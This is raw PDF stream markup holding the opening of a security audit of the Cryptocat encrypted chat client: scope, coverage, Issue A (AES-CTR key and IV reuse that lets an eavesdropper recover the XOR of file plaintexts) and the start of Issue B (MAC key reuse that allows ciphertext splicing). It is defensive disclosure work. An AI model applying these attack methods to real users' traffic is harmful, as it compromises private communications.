12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 165 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Multiparty Chat) Tj T* ET Q Q q 1 0 0 1 397.8898 165 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 147 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (File Transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 147 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 129 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (OTR & Cryptographic Libraries) Tj T* ET Q Q q 1 0 0 1 397.8898 129 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 111 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (JavaScript Cryptography) Tj T* ET Q Q q 1 0 0 1 397.8898 111 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 93 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 397.8898 93 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 75 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 397.8898 75 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (20) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 57 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 397.8898 57 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (20) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 39 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix A: The life cycle of the Cryptocat file transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 39 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (21) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 
0 21 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix B: Work Log) Tj T* ET Q Q q 1 0 0 1 397.8898 21 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (25) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix C: Exploit Code for Issue G) Tj T* ET Q Q q 1 0 0 1 397.8898 3 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (27) Tj T* -60.88 0 Td ET Q Q q Q Q q 1 0 0 1 62.69291 135.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Overview) Tj T* ET Q Q q 1 0 0 1 62.69291 93.02362 cm q BT 1 0 0 1 0 26 Tm .334983 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj 0 0 .501961 rg (Least Authority ) Tj 0 0 0 rg (security consultancy performed a security audit of the ) Tj 0 0 .501961 rg (Cryptocat ) Tj 0 0 0 rg (messaging client, on) Tj T* 0 Tw 2.271797 Tw (behalf of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s sponsor ) Tj 0 0 .501961 rg (Open Technology Fund) Tj 0 0 0 rg (. ) Tj 0 0 .501961 rg (Cryptocat ) Tj 0 0 0 rg (provides end-to-end encrypted chat) Tj T* 0 Tw (using a web browser add-on.) Tj T* ET Q Q endstream endobj % 'R180': class PDFStream 180 0 obj % page stream << /Length 5636 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This report gives the results of the audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 723.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 26 Tm 1.000751 Tw 12 TL /F1 10 Tf 0 0 0 rg (The audit investigated essential security properties such as the confidentiality and integrity protection of) Tj T* 0 Tw 1.03748 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (chat sessions and file transfers. The audit techniques included interactive penetration testing,) Tj T* 0 Tw (code and design analysis, and discussion with developers.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (For the purposes of this audit, we assume integrity of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (add-on installed by the user.) Tj T* ET Q Q q 1 0 0 1 62.69291 609.0236 cm q BT 1 0 0 1 0 38 Tm .089984 Tw 12 TL /F1 10 Tf 0 0 0 rg (A well-known outstanding attack is the side channel of timing information emitted by the implementation of) Tj T* 0 Tw .454269 Tw (cryptographic algorithms computing on secrets. It is an unsolved problem how to prevent that information) Tj T* 0 Tw .81284 Tw (leakage with cryptographic algorithms implemented in ) Tj /F3 10 Tf (JavaScript) Tj /F1 10 Tf (. This issue is outside the scope of this) Tj T* 0 Tw (audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 579.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 38 Tm 4.06248 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our code audit covered all of the primary ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (implementation in ) Tj /F4 10 Tf (src/core/js) Tj /F1 10 Tf (, including) Tj T* 0 Tw .323059 Tw /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, and everything inside ) Tj /F4 10 Tf (etc/ ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (workers/) Tj /F1 10 Tf (. We reviewed third party code under ) Tj /F4 10 Tf (lib/) Tj T* 0 Tw 1.741098 Tw /F1 10 Tf (only when relevant to a particular investigation, which by the end of the audit included all or parts of) Tj T* 0 Tw /F4 10 Tf (bigint.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (crypto-js/) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (elliptic.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (multiParty.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (salsa20.js) Tj /F1 10 Tf (, and ) Tj /F4 10 Tf (strophe/) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .349984 Tw (In terms of feature sets, we focused primarily on cryptographic key management, the entropy system, the) Tj T* 0 Tw (newly developed file transfer feature, and relevant aspects of the user interface.) Tj T* ET Q Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 26 Tm 3.588555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Some notable features which we did not deeply investigate are the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, the) Tj T* 0 Tw 6.893976 Tw (implementation of the ) Tj /F3 10 Tf (Socialist Millionaire's Protocol) Tj /F1 10 Tf (, and whether the ) Tj /F3 10 Tf (Off-The-Record ) Tj /F1 10 Tf (chat) Tj T* 0 Tw (implementation \() Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (\) is a compatible implementation of the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol.) Tj T* ET Q Q q 1 0 0 1 62.69291 363.0236 cm q BT 1 0 0 1 0 74 Tm 1.60152 Tw 12 TL /F1 10 Tf 0 0 0 rg (For the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, we spent some time comparing the specification and implementation.) Tj T* 0 Tw .53936 Tw (However, we shifted focus away from this protocol for several reasons: First, we believe this protocol will) Tj T* 0 Tw 1.942651 Tw (be replaced by one with wider support across academia and industry, such as ) Tj /F3 10 Tf (mpOTR) Tj /F1 10 Tf (. Second, the) Tj T* 0 Tw 1.735814 Tw /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (specification would benefit from including or excluding more security features,) Tj T* 0 Tw 3.959982 Tw (such as transcript soundness and consensus. Finally, the specification focuses on the "how" of) Tj T* 0 Tw 1.471318 Tw (implementation and would benefit from more specificity of the "why" of security goals. We discuss our) Tj T* 0 Tw (general recommendations for ) Tj /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (in the ) Tj 0 0 .501961 rg (Future Work ) Tj 0 0 0 rg (section.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 345.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Appendix B: Work Log ) Tj 0 0 0 rg (describes our investigation process in fine detail.) Tj T* ET Q Q q 1 0 0 1 62.69291 318.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Target Code and Revision) Tj T* ET Q Q q 1 0 0 1 62.69291 300.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All file references are based on the ) Tj /F4 10 Tf (v2.1.15 ) Tj /F1 10 Tf (git tag of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (codebase, which has revision id:) Tj T* ET Q Q q 1 0 0 1 62.69291 266.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL (05ddc47d8c1beff4511199a011859ee046687614) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 246.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All file references use ) Tj /F3 10 Tf (Unix) Tj /F1 10 Tf (-style paths relative to the working directory root.) Tj T* ET Q Q q 1 0 0 1 62.69291 246.8236 cm Q endstream endobj % 'R181': class PDFStream 181 0 obj % page stream << /Length 8926 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Findings) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue A. Disclosure of File Contents Due to Re-use Of Key and IV) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm .686651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer feature re-uses a symmetric encryption key and ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (CTR) Tj /F1 10 Tf (-mode for multiple) Tj T* 0 Tw (file transfers in a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 14 Tm 2.272485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An eavesdropper can learn some or all of the contents of the transferred files under some) Tj T* 0 Tw (conditions.) Tj T* ET Q Q q 1 0 0 1 62.69291 606.0236 cm q BT 1 0 0 1 0 14 Tm 1.315318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker requires only passive collection of records of the ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (traffic \(or the) Tj T* 0 Tw /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests\).) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm q BT 1 0 0 1 0 14 Tm .575366 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This attack requires only simple and efficient off-line computation once records of vulnerable) Tj T* 0 Tw (ciphertext traffic are known.) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 14 Tm .848735 Tw 12 TL /F1 10 Tf 0 0 0 rg (This loss of confidentiality occurs when more than one file is transferred through the file transfer feature) Tj T* 0 Tw (during a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session.) Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (There is ) Tj /F3 10 Tf (no ) Tj /F1 10 Tf (loss of confidentiality when only a single file is transferred.) Tj T* ET Q Q q 1 0 0 1 62.69291 498.0236 cm q BT 1 0 0 1 0 14 Tm 1.194104 Tw 12 TL /F1 10 Tf 0 0 0 rg (This traffic is present at the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol layer, which is embedded in ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (\(via ) Tj /F3 10 Tf (BOSH) Tj /F1 10 Tf (\). The ) Tj /F3 10 Tf (HTTP) Tj T* 0 Tw /F1 10 Tf (traffic of ) Tj /F3 10 Tf (crypto.cat) Tj /F1 10 Tf (, by default uses ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (to and from the server.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 480.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A compromise is feasible through ) Tj /F3 10 Tf (at least ) Tj /F1 10 Tf (several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 474.0236 cm Q q 1 0 0 1 62.69291 474.0236 cm Q q 1 0 0 1 62.69291 450.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.204597 Tw (A server compromise \(including malicious insiders\) could allow live traffic sniffing to recover these) Tj T* 0 Tw (ciphertexts.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 444.0236 cm Q q 1 0 0 1 62.69291 396.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.274269 Tw 12 TL /F1 10 Tf 0 0 0 rg (A server host compromise may grant access to log files containing recorded vulnerable traffic. \(In) Tj T* 0 Tw .488735 Tw (particular we know that ) Tj /F3 10 Tf (ejabberd ) Tj /F1 10 Tf (logs complete ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (traffic when the log system is set to verbose.) Tj T* 0 Tw .716412 Tw (Being based on ) Tj /F3 10 Tf (Erlang ) Tj /F1 10 Tf (infrastructure, it is feasible to increase log verbosity without any interruption) Tj T* 0 Tw (to the service, assuming appropriate permissions on the server.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 390.0236 cm Q q 1 0 0 1 62.69291 378.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Browser logs or caches may contain recorded vulnerable ciphertexts.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 372.0236 cm Q q 1 0 0 1 62.69291 348.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed \(including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service\), an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS) Tj /F1 10 Tf (-protected servers could be used to leverage this attack.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 342.0236 cm Q q 1 0 0 1 62.69291 330.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 330.0236 cm Q q 1 0 0 1 62.69291 276.0236 cm q BT 1 0 0 1 0 38 Tm 1.275984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection, and by reproducing the use of identical) Tj T* 0 Tw .471163 Tw (keys for more than one file transfer using debug output from an instrumented copy of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (. We also) Tj T* 0 Tw 3.347984 Tw (used the debug output to investigate the extent to which key rollover impacts exploitation of the) Tj T* 0 Tw (vulnerability.) Tj T* ET Q Q q 1 0 0 1 62.69291 198.0236 cm q BT 1 0 0 1 0 62 Tm .788443 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (AES ) Tj /F1 10 Tf (counter-mode encryption is used to protect the confidentiality of the file) Tj T* 0 Tw 3.151163 Tw (contents. The ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (used for encrypting file contents is a fixed constant of 0. 
For the receiver, see) Tj T* 0 Tw 1.896627 Tw /F4 10 Tf (./src/core/js/etc/fileTransfer.js) Tj /F1 10 Tf (, line 255, inside ) Tj /F4 10 Tf (Cryptocat.fileHandler) Tj /F1 10 Tf (. \(The sender) Tj T* 0 Tw .41332 Tw (and receiver must use the same ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (for decryption to succeed. The ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is not transmitted, and instead both) Tj T* 0 Tw 1.094987 Tw (parties rely on this implicitly known value. The sender ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (code results in the same values, and we only) Tj T* 0 Tw (refer to the receiver code in this analysis.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 108.0236 cm q BT 1 0 0 1 0 74 Tm 2.089984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Files are transmitted in ) Tj /F3 10 Tf (chunks ) Tj /F1 10 Tf (of sequential bytes, and each chunk is encrypted separately. The ) Tj /F3 10 Tf (IV) Tj T* 0 Tw 1.216905 Tw /F1 10 Tf (parameter, which begins at 0, is incremented for each chunk, as seen in ) Tj /F3 10 Tf (./src/core/js/etc/fileTransfer.js,) Tj T* 0 Tw 1.030542 Tw (line 200) Tj /F1 10 Tf (. The actual ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (passed to the encryption library is padded using an ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (convention as seen in) Tj T* 0 Tw 1.593828 Tw /F4 10 Tf (./src/core/js/lib/otr.js) Tj /F1 10 Tf (, line 298 and related functions, so this chunk index is encoded in the) Tj T* 0 Tw 3.170514 Tw (high 8 bytes. The low 8 bytes are initialized to 0 and the low 4 bytes incremented by the ) Tj /F3 10 Tf (AES) Tj T* 0 Tw 1.578735 Tw /F1 10 Tf (implementation for each block. This means that the same block index within the same chunk index is) Tj T* 0 Tw (encrypted with the same counter value \(which is correct behavior for ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode\).) 
Tj T* ET Q Q q 1 0 0 1 62.69291 78.02362 cm q BT 1 0 0 1 0 14 Tm 4.98152 Tw 12 TL /F1 10 Tf 0 0 0 rg (The secret key used for file transfers is derived during ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session initialization in ) Tj T* 0 Tw .734597 Tw /F4 10 Tf (src/core/js/lib/otr.js) Tj /F1 10 Tf (, line 2163. A new ) Tj /F3 10 Tf (DHSession ) Tj /F1 10 Tf (is initialized whenever there is a "round trip") Tj T* 0 Tw ET Q Q endstream endobj % 'R182': class PDFStream 182 0 obj % page stream << /Length 3498 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 717.0236 cm q BT 1 0 0 1 0 38 Tm .201294 Tw 12 TL /F1 10 Tf 0 0 0 rg (of ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (data packets \227 client A sends a data packet to client B and then B sends a data packet to A \(see) Tj T* 0 Tw 2.727318 Tw /F4 10 Tf (otr.js ) Tj /F1 10 Tf (line 2338\). This sequence of events is not guaranteed to occur between file transfers, so) Tj T* 0 Tw 1.089984 Tw /F3 10 Tf (DHSession ) Tj /F1 10 Tf (rotation cannot be relied upon to prevent this loss of confidentiality. In particular, the server) Tj T* 0 Tw (could suppress messages after a file transfer that would otherwise cause a key rotation.) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 14 Tm .49152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Vulnerability Description: ) Tj /F1 10 Tf (Reuse of the same ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (with counter-mode stream encryption reveals the ) Tj /F3 10 Tf (XOR) Tj T* 0 Tw /F1 10 Tf (of the plaintext of two or more messages, given only the ciphertexts of those messages, as follows:) Tj T* ET Q Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 14 Tm 1.338876 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ciphertext generated by counter-mode is an ) Tj /F3 10 Tf (XOR ) Tj /F1 10 Tf (of a span of plaintext with the output of a block) Tj T* 0 Tw (cipher. 
The block cipher input is the secret key and a block ) Tj /F3 10 Tf (counter) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 623.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL (ciphertext[j] = F\(key, counter[j]\) ^ plaintext[j]) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 591.8236 cm q BT 1 0 0 1 0 14 Tm .133145 Tw 12 TL /F1 10 Tf 0 0 0 rg (Here ) Tj /F4 10 Tf (F ) Tj /F1 10 Tf (is the block cipher, and ) Tj /F4 10 Tf (j ) Tj /F1 10 Tf (is the block number. The first ) Tj /F4 10 Tf (counter[0] ) Tj /F1 10 Tf (is derived directly from the) Tj T* 0 Tw /F3 10 Tf (IV ) Tj /F1 10 Tf (and subsequent ) Tj /F4 10 Tf (counter[j+1] ) Tj /F1 10 Tf (values are derived directly from previous ) Tj /F4 10 Tf (counter[j] ) Tj /F1 10 Tf (values.) Tj T* ET Q Q q 1 0 0 1 62.69291 549.8236 cm q BT 1 0 0 1 0 26 Tm .157356 Tw 12 TL /F1 10 Tf 0 0 0 rg (If the same counter and key values are ever used on different plaintexts over the entire lifetime of the key,) Tj T* 0 Tw 2.327045 Tw (then the ) Tj /F3 10 Tf (XOR ) Tj /F1 10 Tf (of the associated plaintexts can be recovered. 
Suppose ) Tj /F4 10 Tf (A ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (B ) Tj /F1 10 Tf (are two blocks of) Tj T* 0 Tw (plaintext, and ) Tj /F4 10 Tf (A' ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (B' ) Tj /F1 10 Tf (are the associated ciphertexts, then:) Tj T* ET Q Q q 1 0 0 1 62.69291 468.6236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 72 re B* Q q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F4 10 Tf 12 TL (A' ^ B') Tj T* (= \( F\(key, C\) ^ A \) ^ \( F\(key, C\) ^ B \)) Tj T* (= \( F\(key, C\) ^ F\(key, C\) \) ^ \( A ^ B \)) Tj T* (= 0 ^ \( A ^ B \)) Tj T* (= A ^ B) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 448.6236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This reduces the security to that of a ") Tj 0 0 .501961 rg (running-key cipher) Tj 0 0 0 rg (", which is easily broken.) Tj T* ET Q Q q 1 0 0 1 62.69291 448.6236 cm Q endstream endobj % 'R183': class PDFStream 183 0 obj % page stream << /Length 6573 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue B. Integrity Key and IV Reuse in File Transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 699.0236 cm q BT 1 0 0 1 0 14 Tm 2.092651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Re-use of the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key potentially allows files to be modified during file transfer, without) Tj T* 0 Tw (detection by the receiving client.) Tj T* ET Q Q q 1 0 0 1 62.69291 645.0236 cm q BT 1 0 0 1 0 38 Tm 1.722339 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (When keys are reused due to the vulnerability described in Issue A, it is possible to "splice") Tj T* 0 Tw 1.763555 Tw (ciphertext chunks between transfers of files with the same number of chunks, without invalidating the) Tj T* 0 Tw .754431 Tw /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag. 
This gives an active attacker a limited ability to manipulate the contents of files in flight, under) Tj T* 0 Tw (certain conditions.) Tj T* ET Q Q q 1 0 0 1 62.69291 615.0236 cm q BT 1 0 0 1 0 14 Tm 1.129984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (This is an active attack requiring modification of ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests \(or the ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests\).) Tj T* ET Q Q q 1 0 0 1 62.69291 585.0236 cm q BT 1 0 0 1 0 14 Tm 1.127485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This loss of integrity occurs when more than one file is transferred through the file transfer) Tj T* 0 Tw (feature during a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session, and the files have the same number of 64511-byte chunks.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A compromise is feasible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm Q q 1 0 0 1 